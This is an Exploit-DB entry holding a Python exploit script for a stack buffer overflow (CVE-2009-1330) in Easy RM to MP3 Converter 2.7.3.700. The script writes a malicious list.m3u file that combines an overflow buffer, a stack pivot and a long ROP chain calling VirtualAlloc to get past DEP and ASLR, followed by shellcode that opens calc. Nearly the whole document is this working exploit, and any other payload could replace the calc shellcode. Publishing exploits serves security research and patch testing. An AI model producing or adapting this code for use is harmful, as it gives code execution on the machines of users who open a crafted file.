Easy RM to MP3 Converter 2.7.3.700 - .m3u Exploit with Universal DEP+ASLR Bypass

2016-06-13T00:00:00
ID EDB-ID:39933
Type exploitdb
Reporter Fitzl Csaba
Modified 2016-06-13T00:00:00

Description

Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Exploit with Universal DEP+ASLR Bypass. CVE-2009-1330. Local exploit for windows platform

                                        
                                            # Exploit Title: Easy RM to MP3 Converter 2.7.3.700 (.m3u) File BoF Exploit with Universal DEP+ASLR bypass
# Date: 2016-06-12
# Exploit Author: Csaba Fitzl
# Vendor Homepage: N/A
# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe
# Version: 2.7.3.700
# Tested on: Windows 7 x64
# CVE : CVE-2009-1330

import struct

def create_rop_chain():

	# rop chain generated with mona.py - www.corelan.be
	# added missing parts, and some optimisation by Csaba Fitzl
	rop_gadgets = [

	  #mov 1000 to EDX - Csaba
	  0x41414141,  # Filler (compensate)
	  0x41414141,  # Filler (compensate)
	  0x41414141,  # Filler (compensate)
	  0x10025a1c,  # XOR EDX,EDX # RETN 
	  0x1002bc3d,  # MOV EAX,411 # RETN
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc24,  # ADD EAX,80 # POP EBP # RETN
	  0x41414141,  # Filler (compensate)
	  0x1002dc41,  # ADD EAX,40 # POP EBP # RETN
	  0x41414141,  # Filler (compensate)
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x10023327,  # INC EAX # RETN
	  0x10023327,  # INC EAX # RETN
	  0x10023327,  # INC EAX # RETN
	  # AT this point EAX = 0x1000
	  0x1001a788,  # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] 
	  0x41414141,  # Filler (compensate)
	  0x41414141,  # Filler (compensate)
	  0x41414141,  # Filler (compensate)
	  0x1001bf0d, #(RVA : 0x0001bf0d) : # ADC EDX,ESI
	  0x41414141,  # Filler (compensate)
	  
	
	  0x10026d56,  # POP EAX # RETN [MSRMfilter03.dll] 
	  0x10032078,  # ptr to &VirtualAlloc() [IAT MSRMfilter03.dll]
	  0x1002e0c8,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSRMfilter03.dll]
	   
	  0x1001a788,  # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] 
	  0x41414141,  # Filler (compensate)
	  0x41414141,  # Filler (compensate)
	  0x41414141,  # Filler (compensate)
	  0x10027c5a,  # POP EBP # RETN [MSRMfilter03.dll] 
	  0x1001b058,  # & push esp # ret  [MSRMfilter03.dll]
	  0x1002b93e,  # POP EAX # RETN [MSRMfilter03.dll] 
	  0xfffffffb,  # put delta into eax (-> put 0x00000001 into ebx)
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x10023327,  # INC EAX # RETN
	  0x10023327,  # INC EAX # RETN
	  0x1001bdee,  # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll] 
	  0x41414141,  # Filler (compensate)
	  0x41414141,  # Filler (compensate)

	  0x10029f74,  # POP ECX # RETN [MSRMfilter03.dll] 
	  0xffffffff,  #  
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002bc6a,  # POP EDI # RETN [MSRMfilter03.dll] 
	  0x1001c121,  # RETN (ROP NOP) [MSRMfilter03.dll]
	  0x10026f2b,  # POP EAX # RETN [MSRMfilter03.dll] 
	  0x10024004, #address to xor, it will point to the DLL's data section which is writeable. Also will work as NOP
	  0x1002bc07  # PUSHAD # XOR EAX,11005 # ADD BYTE PTR DS:[EAX],AL 

	]
	return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

buffersize = 26090

junk = "A" * buffersize

eip = '\x85\x22\x01\x10' # {pivot 8 / 0x08} :  # ADD ESP,8 # RETN

rop = create_rop_chain()

calc = (
"\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
"\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
"\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
"\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
"\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
"\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7")
 

shell = "\x90"*0x10 + calc

exploit = junk + eip + rop + shell + 'C' * (1000-len(rop)-len(shell))

filename = "list.m3u"
textfile = open(filename , 'w')
textfile.write(exploit)
textfile.close()